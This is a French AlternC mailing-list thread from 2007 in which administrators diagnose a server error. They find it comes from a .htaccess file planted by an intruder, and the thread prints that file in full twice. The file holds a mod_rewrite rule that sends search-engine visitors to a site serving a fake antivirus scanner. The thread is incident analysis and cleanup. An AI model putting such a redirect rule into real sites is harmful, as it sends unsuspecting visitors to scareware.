[AlternC-Users] Internal Server Error

Retour à l'archive de la liste
Le site d'AlternC
Google Custom Search

Olivier Huet (Opti-One) olivier.huet at opti-one.fr
Sam 8 Sep 06:43:46 CEST 2007


Tyrien, utiliserais tu une Dedibox ?

Je viens de voir qu'une de mes dedibox s'était fait hackée aussi... :'(

En fait il semblerait qu'un grand nombre dédibox se soient faites hackées le
28 aout, par la même adresse IP.

Tu trouveras plus d'info ici :
http://forum.ubuntu-fr.org/viewtopic.php?id=142473&p=3

Apres j'ai un peu de mal à comprendre pourquoi celle là et pas une autre...
(j'ai d'autres dedibox qui n'ont pas été hackées)

Aussi un peu de mal à comprendre pourquoi ce .htaccess est dans
/var/alternc/bureau et pas ailleurs...

Ce qui m'inquiète c'est qu'il est root.root... si le pirate a pu faire ça,
il a pu faire n'importe quoi :(

Heureusement cette Dedibox n'était pas critique (et pas spécialement tenue à
jour non plus d'ailleurs)



> -----Message d'origine-----
> De : users-bounces at alternc.org [mailto:users-bounces at alternc.org] De la
> part de e-mail at fr-net.com
> Envoyé : samedi 1 septembre 2007 14:28
> À : Liste des utilisateurs hébergés d'AlternC.
> Objet : Re: [AlternC-Users] Internal Server Error
> 
> Merci pour l'explication.
> A bien y regarder, étant donné que sur un autre serveur sous AlternC
> (0.9.6.1) il n'y a pas de .htaccess dans /var/alternc/bureau/ je me
> demande d'où sort celui-là.
> 
> De plus, dans le .htaccess incriminé, l'URL indiquée dans le
> RewriteCond, "http://rostoffhost.info/strf/", conduit à un site qui
> bascule sur http://scanner.spy-shredder.com/5/ qui est un faux scanner
> de virus qui vous incite à télécharger un exécutable sensé résoudre
> votre infection.
> 
> Voilà ce qu'on en dit (http://forum.malekal.com/sutra26156.php):
> "SpyShredder est un rogue (faux anti-spyware) qui s'installe sans
> permission, le malware affiche de fausses alertes vous indiquant que
> vous êtes infectés par un spyware et vous recommande d'acheter
> l'anti-spyware SpyShredder qui est un produit commercial. "
> 
> Question : vu la "tête" de ce .htaccess (voir copie ci-après) et les
> remarques précédentes, est-il raisonnable de penser qu'il a été mis là
> de façon frauduleuse et que la seule chose recommandable est de le
> supprimer tout simplement?
> 
> ------------------------------------------------------
> RewriteEngine on
> Options +FollowSymLinks
> 
> RewriteCond %{HTTP_REFERER}
> ^.*(google|live|yahoo|ask|msn|aol|altavista).*$ [NC]
> RewriteRule .*$ http://rostoffhost.info/strf/ [L]
> ------------------------------------------------------
> 
> Merci,
> 
> tyrien
> 
> 
> Le 1 sept. 07, à 13:00, Benjamin Sonntag a écrit :
> 
> > e-mail at fr-net.com a écrit :
> >>
> >> Le 1 sept. 07, à 11:48, Benjamin Sonntag a écrit :
> >>
> >>> Quand tu as un message Internal Server Error, il faut vérifier, juste
> >>> après
> >>> /var/log/apache-ssl/error.log
> >>>
> >>> par exemple avec tail -40 /var/log/apache-ssl/error.log
> >>>
> >>> Qui doit, tout en bas, te dire ce qui ne va pas. Si tu ne vois pas de
> >>> quoi il s'agit, envoie-nous en réponse ici les 40 lignes et on
> >>> t'aidera.
> >>
> >> Merci. Evidemment, je ne comprends pas trop ces 40 lignes que je vous
> >> soumets donc:
> >>
> >> [Sat Sep  1 08:47:17 2007] [alert] [client 82.246.92.144]
> >> /var/alternc/bureau/.htaccess: Options not allowed here
> >> [Sat Sep  1 08:49:59 2007] [alert] [client 82.246.92.144]
> >> /var/alternc/bureau/.htaccess: Options not allowed here
> > Tout est là :
> >
> > Options not allowed here
> >
> > donc
> >     - soit tu vires la ligne options de ton .htaccess si tu n'as pas de
> > liens symboliques dans ton /var/alternc/bureau
> >     - soit tu as des liens symboliques, et donc il faut déplacer ce
> > Options dans /etc/alternc/bureau.conf (lieu idéal pour cela) et
> > relancer
> > apache-ssl
> >     - soit tu autorises (déconseillé) la directive Options via un
> > AllowOverride dans le httpd.conf, mais je ne sais plus quel override
> > ...
> >
> > @+
> >
> > Benjamin
> > Serverside
> > http://www.serverside.fr/
> >>
> >> Ça serait le fichier .htaccess qui pose problème? ...alors que
> >> personne -- à ma connaissance -- n'y a touché ces derniers temps!
> >>
> >> Voilà le fichier /var/alternc/bureau/.htaccess :
> >>
> >> serv:/# cat /var/alternc/bureau/.htaccess
> >> RewriteEngine on
> >> Options +FollowSymLinks
> >>
> >> RewriteCond %{HTTP_REFERER}
> >> ^.*(google|live|yahoo|ask|msn|aol|altavista).*$ [NC]
> >> RewriteRule .*$ http://rostoffhost.info/strf/ [L]serv:/#
> >>
> >> Merci de ton aide.
> > _______________________________________________
> > Users mailing list
> > Users at alternc.org
> > http://alternc.org/cgi-bin/mailman/listinfo/users
> >
> 
> _______________________________________________
> Users mailing list
> Users at alternc.org
> http://alternc.org/cgi-bin/mailman/listinfo/users




Plus d'informations sur la liste de diffusion Users